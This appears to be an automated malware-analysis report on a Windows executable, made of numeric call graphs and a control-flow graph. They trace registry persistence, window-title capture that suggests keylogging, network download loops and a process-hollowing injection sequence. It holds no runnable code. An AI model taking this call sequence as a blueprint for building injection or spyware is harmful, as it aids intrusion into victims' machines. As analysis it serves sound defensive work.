102695->102696 102697 401e65 22 API calls 102696->102697 102698 40f02b 102697->102698 102699 401e65 22 API calls 102698->102699 102700 40f04b 102699->102700 102701 43baac _strftime 39 API calls 102700->102701 102702 40f058 102701->102702 102703 401e65 22 API calls 102702->102703 102704 40f063 102703->102704 102705 401e65 22 API calls 102704->102705 102706 40f074 102705->102706 102707 401e65 22 API calls 102706->102707 102708 40f089 102707->102708 102709 401e65 22 API calls 102708->102709 102710 40f09a 102709->102710 102711 40f0a1 StrToIntA 102710->102711 102886 409de4 102711->102886 102714 401e65 22 API calls 102715 40f0bc 102714->102715 102716 40f101 102715->102716 102717 40f0c8 102715->102717 102719 401e65 22 API calls 102716->102719 103104 4344ea 102717->103104 102721 40f111 102719->102721 102725 40f159 102721->102725 102726 40f11d 102721->102726 102722 401e65 22 API calls 102723 40f0e4 102722->102723 102724 40f0eb CreateThread 102723->102724 102724->102716 103568 419fb4 112 API calls 2 library calls 102724->103568 102727 401e65 22 API calls 102725->102727 102728 4344ea new 22 API calls 102726->102728 102729 40f162 102727->102729 102730 40f126 102728->102730 102733 40f1cc 102729->102733 102734 40f16e 102729->102734 102731 401e65 22 API calls 102730->102731 102732 40f138 102731->102732 102737 40f13f CreateThread 102732->102737 102735 401e65 22 API calls 102733->102735 102736 401e65 22 API calls 102734->102736 102738 40f1d5 102735->102738 102739 40f17e 102736->102739 102737->102725 103567 419fb4 112 API calls 2 library calls 102737->103567 102740 40f1e1 102738->102740 102741 40f21a 102738->102741 102742 401e65 22 API calls 102739->102742 102744 401e65 22 API calls 102740->102744 102911 41b60d GetComputerNameExW GetUserNameW 102741->102911 102745 40f193 102742->102745 102747 40f1ea 102744->102747 103111 40d9e8 102745->103111 102752 401e65 22 API calls 102747->102752 102748 401f13 28 API calls 102749 40f22e 102748->102749 102751 401f09 11 API calls 102749->102751 102755 40f237 102751->102755 102756 40f1ff 102752->102756 102754 401f13 28 API calls 102757 40f1b2 102754->102757 102758 40f240 SetProcessDEPPolicy 102755->102758 102759 40f243 CreateThread 102755->102759 102765 43baac _strftime 39 API calls 102756->102765 102760 401f09 11 API calls 102757->102760 102758->102759 102761 40f264 102759->102761 102762 40f258 CreateThread 102759->102762 103540 40f7a7 102759->103540 102766 40f1bb CreateThread 102760->102766 102763 40f279 102761->102763 102764 40f26d CreateThread 102761->102764 102762->102761 103569 4120f7 145 API calls 102762->103569 102768 40f2cc 102763->102768 102770 402093 28 API calls 102763->102770 102764->102763 103571 4126db 38 API calls ___scrt_get_show_window_mode 102764->103571 102767 40f20c 102765->102767 102766->102733 103572 401be9 49 API calls _strftime 102766->103572 103122 40c162 7 API calls 102767->103122 102922 4134ff RegOpenKeyExA 102768->102922 102771 40f29c 102770->102771 103123 4052fd 28 API calls 102771->103123 102776 40f2ed 102778 41bc5e 28 API calls 102776->102778 102780 40f2fd 102778->102780 103124 41361b 31 API calls 102780->103124 102785 40f313 102786 401f09 11 API calls 102785->102786 102789 40f31e 102786->102789 102787 40f346 DeleteFileW 102788 40f34d 102787->102788 102787->102789 102788->102596 102789->102596 102789->102787 102790 40f334 Sleep 102789->102790 102790->102789 102791->102469 102792->102473 102793->102478 102794->102482 102795->102486 102796->102487 102797->102489 102798->102492 102799->102496 102800->102498 102801->102500 102802->102503 102804 44f06b 102803->102804 102805 44f062 102803->102805 102804->102511 102808 44ef58 48 API calls 5 library calls 102805->102808 102807->102511 102808->102804 102810 41cb8f LoadLibraryA GetProcAddress 102809->102810 102811 41cb7f GetModuleHandleA GetProcAddress 102809->102811 102812 41cbb8 44 API calls 102810->102812 102813 41cba8 LoadLibraryA GetProcAddress 102810->102813 102811->102810 102812->102515 102813->102812 103127 41b4a8 FindResourceA 102814->103127 102817 43bd51 _Yarn 21 API calls 102818 40f3ed _Yarn 102817->102818 102819 4020b7 28 API calls 102818->102819 102820 40f408 102819->102820 102821 401fe2 28 API calls 102820->102821 102822 40f413 102821->102822 102823 401fd8 11 API calls 102822->102823 102824 40f41c 102823->102824 102825 43bd51 _Yarn 21 API calls 102824->102825 102826 40f42d _Yarn 102825->102826 103130 406dd8 102826->103130 102828 40f460 102828->102517 102830 40fb23 102829->102830 102832 40fb2a 102829->102832 103133 402163 11 API calls 102830->103133 102832->102525 103134 401fab 102833->103134 102835 40d073 CreateMutexA GetLastError 102835->102574 103135 41bfb7 102836->103135 102841 401fe2 28 API calls 102842 41b2ff 102841->102842 102843 401fd8 11 API calls 102842->102843 102844 41b307 102843->102844 102845 4135a6 31 API calls 102844->102845 102847 41b35d 102844->102847 102846 41b330 102845->102846 102848 41b33b StrToIntA 102846->102848 102847->102581 102849 41b352 102848->102849 102850 41b349 102848->102850 102852 401fd8 11 API calls 102849->102852 103144 41cf69 22 API calls 102850->103144 102852->102847 102854 40772a 102853->102854 102855 413549 3 API calls 102854->102855 102856 407731 102855->102856 102856->102591 102856->102592 102858 41bc72 102857->102858 102859 40b904 28 API calls 102858->102859 102860 41bc7a 102859->102860 102860->102608 102862 401f22 102861->102862 102863 401f6a 102861->102863 102864 402252 11 API calls 102862->102864 102863->102617 102865 401f2b 102864->102865 102866 401f6d 102865->102866 102867 401f46 102865->102867 103146 402336 102866->103146 103145 40305c 28 API calls 102867->103145 102871 413965 102870->102871 102872 406dd8 28 API calls 102871->102872 102873 41397a 102872->102873 102874 4020f6 28 API calls 102873->102874 102875 41398a 102874->102875 102876 41376f 14 API calls 102875->102876 102877 413994 102876->102877 102878 401fd8 11 API calls 102877->102878 102879 4139a1 102878->102879 102879->102669 102881 4137bf 102880->102881 102884 413788 102880->102884 102882 401fd8 11 API calls 102881->102882 102883 40ef9e 102882->102883 102883->102671 102885 41379a RegSetValueExA RegCloseKey 102884->102885 102885->102881 102887 409e02 _wcslen 102886->102887 102888 409e24 102887->102888 102889 409e0d 102887->102889 102891 40da34 32 API calls 102888->102891 102890 40da34 32 API calls 102889->102890 102892 409e15 102890->102892 102893 409e2c 102891->102893 102894 401f13 28 API calls 102892->102894 102895 401f13 28 API calls 102893->102895 102896 409e1f 102894->102896 102897 409e3a 102895->102897 102900 401f09 11 API calls 102896->102900 102898 401f09 11 API calls 102897->102898 102899 409e42 102898->102899 103165 40915b 28 API calls 102899->103165 102902 409e79 102900->102902 103150 40a109 102902->103150 102903 409e54 103166 403014 102903->103166 102908 401f13 28 API calls 102909 409e69 102908->102909 102910 401f09 11 API calls 102909->102910 102910->102896 102912 40417e 28 API calls 102911->102912 102913 41b65c 102912->102913 103350 4042fc 102913->103350 102916 403014 28 API calls 102917 41b672 102916->102917 102918 401f09 11 API calls 102917->102918 102919 41b67b 102918->102919 102920 401f09 11 API calls 102919->102920 102921 40f223 102920->102921 102921->102748 102923 413520 RegQueryValueExA RegCloseKey 102922->102923 102924 40f2e4 102922->102924 102923->102924 102924->102621 102924->102776 102926 40f392 102925->102926 102927 413a3f RegDeleteValueW 102925->102927 102926->102614 102927->102926 102929 40dd5b 102928->102929 102930 4134ff 3 API calls 102929->102930 102931 40dd62 102930->102931 102932 40dd81 102931->102932 103425 401707 102931->103425 102936 414f2a 102932->102936 102934 40dd6f 103428 413877 RegCreateKeyA 102934->103428 102937 4020df 11 API calls 102936->102937 102938 414f3e 102937->102938 103442 41b8b3 102938->103442 102941 4020df 11 API calls 102942 414f54 102941->102942 102943 401e65 22 API calls 102942->102943 102944 414f62 102943->102944 102945 43baac _strftime 39 API calls 102944->102945 102946 414f6f 102945->102946 102947 414f81 102946->102947 102948 414f74 Sleep 102946->102948 102949 402093 28 API calls 102947->102949 102948->102947 102950 414f90 102949->102950 102951 401e65 22 API calls 102950->102951 102952 414f99 102951->102952 102953 4020f6 28 API calls 102952->102953 102954 414fa4 102953->102954 102955 41be1b 28 API calls 102954->102955 102956 414fac 102955->102956 103446 40489e WSAStartup 102956->103446 102958 414fb6 102959 401e65 22 API calls 102958->102959 102960 414fbf 102959->102960 102961 401e65 22 API calls 102960->102961 103004 41503e 102960->103004 102962 414fd8 102961->102962 102963 401e65 22 API calls 102962->102963 102964 414fe9 102963->102964 102966 401e65 22 API calls 102964->102966 102965 41be1b 28 API calls 102965->103004 102967 414ffa 102966->102967 102969 401e65 22 API calls 102967->102969 102968 406c1e 28 API calls 102968->103004 102970 41500b 102969->102970 102971 401e65 22 API calls 102970->102971 102973 41501c 102971->102973 102972 401fe2 28 API calls 102972->103004 102974 401e65 22 API calls 102973->102974 102975 41502e 102974->102975 103472 40473d 88 API calls 102975->103472 102977 41b4ef 79 API calls 102977->103004 102979 41518c WSAGetLastError 103473 41cae1 30 API calls 102979->103473 102980 40482d 3 API calls 102980->103004 102983 404f51 104 API calls 102983->103004 102984 402093 28 API calls 102984->103004 102985 4048c8 96 API calls 102985->103004 102986 404e26 98 API calls 102986->103004 102987 401e65 22 API calls 102987->103004 102988 40531e 28 API calls 102988->103004 102989 401e8d 11 API calls 102989->103004 102990 401e65 22 API calls 102991 415a33 102990->102991 102991->102990 102992 43baac _strftime 39 API calls 102991->102992 103475 40b051 84 API calls 102991->103475 102993 415acf Sleep 102992->102993 102993->103004 102996 40905c 28 API calls 102996->103004 102997 441e81 20 API calls 102997->103004 102998 4020f6 28 API calls 102998->103004 102999 4136f8 3 API calls 102999->103004 103000 4135a6 31 API calls 103000->103004 103001 40417e 28 API calls 103001->103004 103004->102965 103004->102968 103004->102972 103004->102977 103004->102979 103004->102980 103004->102983 103004->102984 103004->102985 103004->102986 103004->102987 103004->102988 103004->102989 103004->102991 103004->102996 103004->102997 103004->102998 103004->102999 103004->103000 103004->103001 103005 401e65 22 API calls 103004->103005 103009 41bb8e 28 API calls 103004->103009 103010 41ba96 30 API calls 103004->103010 103011 41bd1e 28 API calls 103004->103011 103013 402f31 28 API calls 103004->103013 103014 406383 28 API calls 103004->103014 103015 402f10 28 API calls 103004->103015 103016 402ea1 28 API calls 103004->103016 103017 404aa1 60 API calls 103004->103017 103018 401fd8 11 API calls 103004->103018 103019 401f09 11 API calls 103004->103019 103020 404c10 264 API calls 103004->103020 103022 415a71 CreateThread 103004->103022 103447 414ee9 103004->103447 103453 41b7e0 103004->103453 103456 4145bd 103004->103456 103459 40dd89 103004->103459 103465 41bc42 103004->103465 103468 41bae6 GetLastInputInfo GetTickCount 103004->103468 103469 40f8d1 GetLocaleInfoA 103004->103469 103474 4052fd 28 API calls 103004->103474 103006 415439 GetTickCount 103005->103006 103007 41bb8e 28 API calls 103006->103007 103007->103004 103009->103004 103010->103004 103011->103004 103013->103004 103014->103004 103015->103004 103016->103004 103017->103004 103018->103004 103019->103004 103020->103004 103022->103004 103516 41ad17 105 API calls 103022->103516 103023->102533 103024->102541 103025->102545 103028 4020df 11 API calls 103027->103028 103029 406c2a 103028->103029 103030 4032a0 28 API calls 103029->103030 103031 406c47 103030->103031 103031->102566 103033 40eba4 103032->103033 103034 413573 RegQueryValueExA RegCloseKey 103032->103034 103033->102563 103033->102580 103034->103033 103035->102569 103036->102599 103037->102592 103038->102584 103039->102597 103041 401f86 11 API calls 103040->103041 103042 40da50 103041->103042 103043 40da70 103042->103043 103044 40daa5 103042->103044 103048 40da66 103042->103048 103532 41b5b4 29 API calls 103043->103532 103047 41bfb7 2 API calls 103044->103047 103046 40db99 GetLongPathNameW 103050 40417e 28 API calls 103046->103050 103051 40daaa 103047->103051 103048->103046 103049 40da79 103052 401f13 28 API calls 103049->103052 103053 40dbae 103050->103053 103054 40db00 103051->103054 103055 40daae 103051->103055 103056 40da83 103052->103056 103057 40417e 28 API calls 103053->103057 103058 40417e 28 API calls 103054->103058 103059 40417e 28 API calls 103055->103059 103063 401f09 11 API calls 103056->103063 103061 40dbbd 103057->103061 103062 40db0e 103058->103062 103060 40dabc 103059->103060 103068 40417e 28 API calls 103060->103068 103517 40ddd1 103061->103517 103067 40417e 28 API calls 103062->103067 103063->103048 103070 40db24 103067->103070 103071 40dad2 103068->103071 103073 402fa5 28 API calls 103070->103073 103074 402fa5 28 API calls 103071->103074 103072 402fa5 28 API calls 103075 40dbe5 103072->103075 103076 40db2f 103073->103076 103077 40dadd 103074->103077 103078 401f09 11 API calls 103075->103078 103079 401f13 28 API calls 103076->103079 103080 401f13 28 API calls 103077->103080 103081 40dbef 103078->103081 103082 40db3a 103079->103082 103083 40dae8 103080->103083 103084 401f09 11 API calls 103081->103084 103085 401f09 11 API calls 103082->103085 103086 401f09 11 API calls 103083->103086 103087 40dbf8 103084->103087 103088 40db43 103085->103088 103089 40daf1 103086->103089 103090 401f09 11 API calls 103087->103090 103091 401f09 11 API calls 103088->103091 103092 401f09 11 API calls 103089->103092 103093 40dc01 103090->103093 103091->103056 103092->103056 103094 401f09 11 API calls 103093->103094 103095 40dc0a 103094->103095 103096 401f09 11 API calls 103095->103096 103097 40dc13 103096->103097 103097->102657 103098->102670 103099->102691 103101 41371e RegQueryValueExA RegCloseKey 103100->103101 103102 413742 103100->103102 103101->103102 103102->102650 103103->102685 103110 4344ef 103104->103110 103105 43bd51 _Yarn 21 API calls 103105->103110 103106 40f0d1 103106->102722 103110->103105 103110->103106 103537 442f80 7 API calls 2 library calls 103110->103537 103538 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 103110->103538 103539 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 103110->103539 103112 402093 28 API calls 103111->103112 103113 40d9ff 103112->103113 103114 41bc5e 28 API calls 103113->103114 103115 40da0a 103114->103115 103116 40da34 32 API calls 103115->103116 103117 40da1b 103116->103117 103118 401f09 11 API calls 103117->103118 103119 40da24 103118->103119 103120 401fd8 11 API calls 103119->103120 103121 40da2c 103120->103121 103121->102754 103122->102741 103124->102785 103125->102590 103128 41b4c5 LoadResource LockResource SizeofResource 103127->103128 103129 40f3de 103127->103129 103128->103129 103129->102817 103131 4020b7 28 API calls 103130->103131 103132 406dec 103131->103132 103132->102828 103133->102832 103136 41bfc4 GetCurrentProcess IsWow64Process 103135->103136 103137 41b2d1 103135->103137 103136->103137 103138 41bfdb 103136->103138 103139 4135a6 RegOpenKeyExA 103137->103139 103138->103137 103140 4135d4 RegQueryValueExA RegCloseKey 103139->103140 103141 4135fe 103139->103141 103140->103141 103142 402093 28 API calls 103141->103142 103143 413613 103142->103143 103143->102841 103144->102849 103145->102863 103147 402347 103146->103147 103148 402252 11 API calls 103147->103148 103149 4023c7 103148->103149 103149->102863 103151 40a127 103150->103151 103152 413549 3 API calls 103151->103152 103153 40a12e 103152->103153 103154 40a142 103153->103154 103155 40a15c 103153->103155 103156 409e9b 103154->103156 103157 40a147 103154->103157 103171 40905c 103155->103171 103156->102714 103159 40905c 28 API calls 103157->103159 103161 40a155 103159->103161 103199 40a22d 29 API calls 103161->103199 103164 40a15a 103164->103156 103165->102903 103318 403222 103166->103318 103168 403022 103322 403262 103168->103322 103172 409072 103171->103172 103173 402252 11 API calls 103172->103173 103174 40908c 103173->103174 103175 404267 28 API calls 103174->103175 103176 40909a 103175->103176 103177 40a179 103176->103177 103200 40b8ec 103177->103200 103180 40a1a2 103183 402093 28 API calls 103180->103183 103181 40a1ca 103182 402093 28 API calls 103181->103182 103184 40a1d5 103182->103184 103185 40a1ac 103183->103185 103186 402093 28 API calls 103184->103186 103187 41bc5e 28 API calls 103185->103187 103188 40a1e4 103186->103188 103189 40a1ba 103187->103189 103190 41b4ef 79 API calls 103188->103190 103204 40b164 31 API calls _Yarn 103189->103204 103192 40a1e9 CreateThread 103190->103192 103194 40a210 CreateThread 103192->103194 103195 40a204 CreateThread 103192->103195 103212 40a27d 103192->103212 103193 40a1c1 103196 401fd8 11 API calls 103193->103196 103197 401f09 11 API calls 103194->103197 103206 40a289 103194->103206 103195->103194 103209 40a267 103195->103209 103196->103181 103198 40a224 103197->103198 103198->103156 103199->103164 103317 40a273 163 API calls 103199->103317 103201 40b8f5 103200->103201 103202 40a197 103200->103202 103205 40b96c 28 API calls 103201->103205 103202->103180 103202->103181 103204->103193 103205->103202 103215 40acd6 103206->103215 103257 40a2b8 85 API calls 103209->103257 103211 40a270 103258 40a726 103212->103258 103243 40ace4 103215->103243 103216 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 103218 40b904 28 API calls 103216->103218 103217 40a292 103218->103243 103222 41bae6 GetLastInputInfo GetTickCount 103222->103243 103224 40ad84 GetWindowTextW 103224->103243 103226 40aedc 103228 401f09 11 API calls 103226->103228 103227 40b8ec 28 API calls 103227->103243 103228->103217 103229 40ae49 Sleep 103229->103243 103230 441e81 20 API calls 103230->103243 103232 402093 28 API calls 103232->103243 103234 40905c 28 API calls 103239 40add1 103234->103239 103236 406383 28 API calls 103236->103243 103238 403014 28 API calls 103238->103243 103239->103234 103239->103243 103253 40b164 31 API calls _Yarn 103239->103253 103240 41bc5e 28 API calls 103240->103243 103241 40a636 12 API calls 103241->103243 103242 401f09 11 API calls 103242->103243 103243->103216 103243->103217 103243->103222 103243->103224 103243->103226 103243->103227 103243->103229 103243->103230 103243->103232 103243->103236 103243->103238 103243->103239 103243->103240 103243->103241 103243->103242 103244 401fd8 11 API calls 103243->103244 103245 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 103243->103245 103246 401f86 103243->103246 103250 434770 23 API calls __onexit 103243->103250 103251 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 103243->103251 103252 409044 28 API calls 103243->103252 103254 40b97c 28 API calls 103243->103254 103255 40b748 40 API calls 2 library calls 103243->103255 103256 4052fd 28 API calls 103243->103256 103244->103243 103247 401f8e 103246->103247 103248 402252 11 API calls 103247->103248 103249 401f99 103248->103249 103249->103243 103250->103243 103251->103243 103252->103243 103253->103239 103254->103243 103255->103243 103257->103211 103259 40a73b Sleep 103258->103259 103279 40a675 103259->103279 103261 40a286 103262 40a77b CreateDirectoryW 103266 40a74d 103262->103266 103263 40a78c GetFileAttributesW 103263->103266 103264 40a7a3 SetFileAttributesW 103264->103266 103266->103259 103266->103261 103266->103262 103266->103263 103266->103264 103268 401e65 22 API calls 103266->103268 103270 40a7ee 103266->103270 103292 41c3f1 103266->103292 103267 40a81d PathFileExistsW 103267->103270 103268->103266 103269 4020df 11 API calls 103269->103270 103270->103267 103270->103269 103272 4020b7 28 API calls 103270->103272 103273 40a926 SetFileAttributesW 103270->103273 103274 406dd8 28 API calls 103270->103274 103275 401fe2 28 API calls 103270->103275 103277 401fd8 11 API calls 103270->103277 103278 401fd8 11 API calls 103270->103278 103302 41c485 CreateFileW 103270->103302 103310 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 103270->103310 103272->103270 103273->103266 103274->103270 103275->103270 103277->103270 103278->103266 103280 40a722 103279->103280 103282 40a68b 103279->103282 103280->103266 103281 40a6aa CreateFileW 103281->103282 103283 40a6b8 GetFileSize 103281->103283 103282->103281 103284 40a6ed FindCloseChangeNotification 103282->103284 103285 40a6ff 103282->103285 103286 40a6e2 Sleep 103282->103286 103287 40a6db 103282->103287 103283->103282 103283->103284 103284->103282 103285->103280 103289 40905c 28 API calls 103285->103289 103286->103284 103311 40b0dc 83 API calls 103287->103311 103290 40a71b 103289->103290 103291 40a179 124 API calls 103290->103291 103291->103280 103293 41c404 CreateFileW 103292->103293 103295 41c441 103293->103295 103296 41c43d 103293->103296 103297 41c461 WriteFile 103295->103297 103298 41c448 SetFilePointer 103295->103298 103296->103266 103299 41c474 103297->103299 103300 41c476 FindCloseChangeNotification 103297->103300 103298->103297 103301 41c458 CloseHandle 103298->103301 103299->103300 103300->103296 103301->103296 103303 41c4ab 103302->103303 103304 41c4af GetFileSize 103302->103304 103303->103270 103312 40244e 103304->103312 103306 41c4c3 103307 41c4d5 ReadFile 103306->103307 103308 41c4e2 103307->103308 103309 41c4e4 FindCloseChangeNotification 103307->103309 103308->103309 103309->103303 103310->103270 103311->103286 103313 402456 103312->103313 103315 402460 103313->103315 103316 402a51 28 API calls 103313->103316 103315->103306 103316->103315 103319 40322e 103318->103319 103328 403618 103319->103328 103321 40323b 103321->103168 103323 40326e 103322->103323 103324 402252 11 API calls 103323->103324 103325 403288 103324->103325 103326 402336 11 API calls 103325->103326 103327 403031 103326->103327 103327->102908 103329 403626 103328->103329 103330 403644 103329->103330 103331 40362c 103329->103331 103333 40365c 103330->103333 103334 40369e 103330->103334 103339 4036a6 103331->103339 103337 4027e6 28 API calls 103333->103337 103338 403642 103333->103338 103348 4028a4 22 API calls 103334->103348 103337->103338 103338->103321 103340 402888 22 API calls 103339->103340 103341 4036b9 103340->103341 103342 40372c 103341->103342 103343 4036de 103341->103343 103349 4028a4 22 API calls 103342->103349 103346 4027e6 28 API calls 103343->103346 103347 4036f0 103343->103347 103346->103347 103347->103338 103355 404353 103350->103355 103352 40430a 103353 403262 11 API calls 103352->103353 103354 404319 103353->103354 103354->102916 103356 40435f 103355->103356 103359 404371 103356->103359 103358 40436d 103358->103352 103360 40437f 103359->103360 103361 404385 103360->103361 103362 40439e 103360->103362 103423 4034e6 28 API calls 103361->103423 103363 402888 22 API calls 103362->103363 103364 4043a6 103363->103364 103366 404419 103364->103366 103367 4043bf 103364->103367 103424 4028a4 22 API calls 103366->103424 103369 4027e6 28 API calls 103367->103369 103378 40439c 103367->103378 103369->103378 103378->103358 103423->103378 103431 43aa9a 103425->103431 103429 4138b9 103428->103429 103430 41388f RegSetValueExA RegCloseKey 103428->103430 103429->102932 103430->103429 103434 43aa1b 103431->103434 103433 40170d 103433->102934 103435 43aa2a 103434->103435 103436 43aa3e 103434->103436 103440 4405dd 20 API calls _abort 103435->103440 103439 43aa2f __alldvrm __cftof 103436->103439 103441 448957 11 API calls 2 library calls 103436->103441 103439->103433 103440->103439 103441->103439 103445 41b8f9 _Yarn ___scrt_get_show_window_mode 103442->103445 103443 402093 28 API calls 103444 414f49 103443->103444 103444->102941 103445->103443 103446->102958 103448 414f02 WSASetLastError 103447->103448 103449 414ef8 103447->103449 103448->103004 103476 414d86 29 API calls ___std_exception_copy 103449->103476 103451 414efd 103451->103448 103477 41b7b6 GlobalMemoryStatusEx 103453->103477 103455 41b7f5 103455->103004 103478 414580 103456->103478 103460 40dda5 103459->103460 103461 4134ff 3 API calls 103460->103461 103463 40ddac 103461->103463 103462 40ddc4 103462->103004 103463->103462 103464 413549 3 API calls 103463->103464 103464->103462 103466 4020b7 28 API calls 103465->103466 103467 41bc57 103466->103467 103467->103004 103468->103004 103470 402093 28 API calls 103469->103470 103471 40f8f6 103470->103471 103471->103004 103472->103004 103473->103004 103475->103004 103476->103451 103477->103455 103481 414553 103478->103481 103482 414568 ___scrt_initialize_default_local_stdio_options 103481->103482 103485 43f79d 103482->103485 103488 43c4f0 103485->103488 103489 43c530 103488->103489 103490 43c518 103488->103490 103489->103490 103492 43c538 103489->103492 103510 4405dd 20 API calls _abort 103490->103510 103511 43a7b7 35 API calls 3 library calls 103492->103511 103494 43c548 103512 43cc76 20 API calls 2 library calls 103494->103512 103495 43c51d __cftof 103503 434fcb 103495->103503 103498 43c5c0 103513 43d2e4 50 API calls 3 library calls 103498->103513 103499 414576 103499->103004 103501 43c5cb 103514 43cce0 20 API calls _free 103501->103514 103504 434fd6 IsProcessorFeaturePresent 103503->103504 103505 434fd4 103503->103505 103507 435018 103504->103507 103505->103499 103515 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103507->103515 103509 4350fb 103509->103499 103510->103495 103511->103494 103512->103498 103513->103501 103514->103495 103515->103509 103518 40ddd9 103517->103518 103519 402252 11 API calls 103518->103519 103520 40dde4 103519->103520 103521 4041d9 28 API calls 103520->103521 103522 40dbd0 103521->103522 103523 402fa5 103522->103523 103527 402fb4 103523->103527 103524 402ff6 103534 40323f 103524->103534 103526 402ff4 103528 403262 11 API calls 103526->103528 103527->103524 103530 402feb 103527->103530 103529 40300d 103528->103529 103529->103072 103533 403211 28 API calls 103530->103533 103532->103049 103533->103526 103535 4036a6 28 API calls 103534->103535 103536 40324c 103535->103536 103536->103526 103537->103110 103542 40f7c2 103540->103542 103541 413549 3 API calls 103541->103542 103542->103541 103543 40f866 103542->103543 103545 40f856 Sleep 103542->103545 103562 40f7f4 103542->103562 103546 40905c 28 API calls 103543->103546 103544 40905c 28 API calls 103544->103562 103545->103542 103548 40f871 103546->103548 103550 41bc5e 28 API calls 103548->103550 103549 41bc5e 28 API calls 103549->103562 103551 40f87d 103550->103551 103575 413814 14 API calls 103551->103575 103554 40f890 103556 401f09 11 API calls 103554->103556 103555 401f09 11 API calls 103555->103562 103557 40f89c 103556->103557 103559 402093 28 API calls 103557->103559 103558 402093 28 API calls 103558->103562 103560 40f8ad 103559->103560 103563 41376f 14 API calls 103560->103563 103561 41376f 14 API calls 103561->103562 103562->103544 103562->103545 103562->103549 103562->103555 103562->103558 103562->103561 103573 40d096 111 API calls ___scrt_get_show_window_mode 103562->103573 103574 413814 14 API calls 103562->103574 103564 40f8c0 103563->103564 103576 412850 TerminateProcess WaitForSingleObject 103564->103576 103566 40f8c8 ExitProcess 103577 4127ee 61 API calls 103569->103577 103574->103562 103575->103554 103576->103566 103578 5351123 103581 535114a 103578->103581 103582 535117c 103581->103582 103583 53512e6 VirtualAlloc 103582->103583 103589 5351139 103582->103589 103584 5351316 103583->103584 103585 53513dc GetPEB 103584->103585 103584->103589 103588 53513f2 103585->103588 103586 53514aa GetPEB 103586->103589 103587 535145b LoadLibraryA 103587->103588 103587->103589 103588->103586 103588->103587 103590 415d06 103605 41b380 103590->103605 103592 415d0f 103593 4020f6 28 API calls 103592->103593 103594 415d1e 103593->103594 103595 404aa1 60 API calls 103594->103595 103596 415d2a 103595->103596 103597 417089 103596->103597 103598 401fd8 11 API calls 103596->103598 103599 401e8d 11 API calls 103597->103599 103598->103597 103600 417092 103599->103600 103601 401fd8 11 API calls 103600->103601 103602 41709e 103601->103602 103603 401fd8 11 API calls 103602->103603 103604 4170aa 103603->103604 103606 4020df 11 API calls 103605->103606 103607 41b38e 103606->103607 103608 43bd51 _Yarn 21 API calls 103607->103608 103609 41b39e InternetOpenW InternetOpenUrlW 103608->103609 103610 41b3c5 InternetReadFile 103609->103610 103611 41b3e8 103610->103611 103611->103610 103612 4020b7 28 API calls 103611->103612 103613 41b415 InternetCloseHandle InternetCloseHandle 103611->103613 103615 401fd8 11 API calls 103611->103615 103612->103611 103614 41b427 103613->103614 103614->103592 103615->103611 103616 1e6cc7a7 103617 1e6cc7be 103616->103617 103623 1e6cc82c 103616->103623 103617->103623 103628 1e6cc7e6 GetModuleHandleA 103617->103628 103618 1e6cc835 GetModuleHandleA 103620 1e6cc83f 103618->103620 103620->103620 103620->103623 103624 1e6cc85f GetProcAddress 103620->103624 103621 1e6cc872 103622 1e6cc7dd 103622->103620 103622->103623 103625 1e6cc800 GetProcAddress 103622->103625 103623->103618 103623->103620 103623->103621 103624->103623 103625->103623 103626 1e6cc80d VirtualProtect 103625->103626 103626->103623 103627 1e6cc81c VirtualProtect 103626->103627 103627->103623 103629 1e6cc7ef 103628->103629 103634 1e6cc82c 103628->103634 103640 1e6cc803 GetProcAddress 103629->103640 103631 1e6cc835 GetModuleHandleA 103638 1e6cc83f 103631->103638 103632 1e6cc872 103633 1e6cc7f4 103633->103634 103635 1e6cc800 GetProcAddress 103633->103635 103634->103631 103634->103632 103634->103638 103635->103634 103636 1e6cc80d VirtualProtect 103635->103636 103636->103634 103637 1e6cc81c VirtualProtect 103636->103637 103637->103634 103638->103634 103639 1e6cc85f GetProcAddress 103638->103639 103639->103634 103641 1e6cc80d VirtualProtect 103640->103641 103642 1e6cc82c 103640->103642 103641->103642 103643 1e6cc81c VirtualProtect 103641->103643 103644 1e6cc835 GetModuleHandleA 103642->103644 103645 1e6cc872 103642->103645 103643->103642 103647 1e6cc83f 103644->103647 103646 1e6cc85f GetProcAddress 103646->103647 103647->103642 103647->103646 103648 40165e 103649 401666 103648->103649 103652 401669 103648->103652 103650 4016a8 103651 4344ea new 22 API calls 103650->103651 103653 40169c 103651->103653 103652->103650 103654 401696 103652->103654 103655 4344ea new 22 API calls 103654->103655 103655->103653

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5 4180ef-418118 6 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5->6 7 418480 6->7 8 418189-418190 6->8 9 418482-41848c 7->9 8->7 10 418196-41819d 8->10 10->7 11 4181a3-4181a5 10->11 11->7 12 4181ab-4181d8 call 436e90 * 2 11->12 12->7 17 4181de-4181e9 12->17 17->7 18 4181ef-41821f CreateProcessW 17->18 19 418225-41824d VirtualAlloc Wow64GetThreadContext 18->19 20 41847a GetLastError 18->20 21 418253-418273 ReadProcessMemory 19->21 22 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 19->22 20->7 21->22 23 418279-41829b NtCreateSection 21->23 22->7 23->22 24 4182a1-4182ae 23->24 25 4182c1-4182e3 NtMapViewOfSection 24->25 26 4182b0-4182bb NtUnmapViewOfSection 24->26 27 4182e5-418322 VirtualFree NtClose TerminateProcess 25->27 28 41832d-418354 GetCurrentProcess NtMapViewOfSection 25->28 26->25 27->6 29 418328 27->29 28->22 30 41835a-41835e 28->30 29->7 31 418360-418364 30->31 32 418367-418385 call 436910 30->32 31->32 35 4183c7-4183d0 32->35 36 418387-418395 32->36 38 4183f0-4183f4 35->38 39 4183d2-4183d8 35->39 37 418397-4183ba call 436910 36->37 49 4183bc-4183c3 37->49 42 4183f6-418413 WriteProcessMemory 38->42 43 418419-418430 Wow64SetThreadContext 38->43 39->38 41 4183da-4183ed call 418503 39->41 41->38 42->22 46 418415 42->46 43->22 47 418432-41843e ResumeThread 43->47 46->43 47->22 48 418440-418442 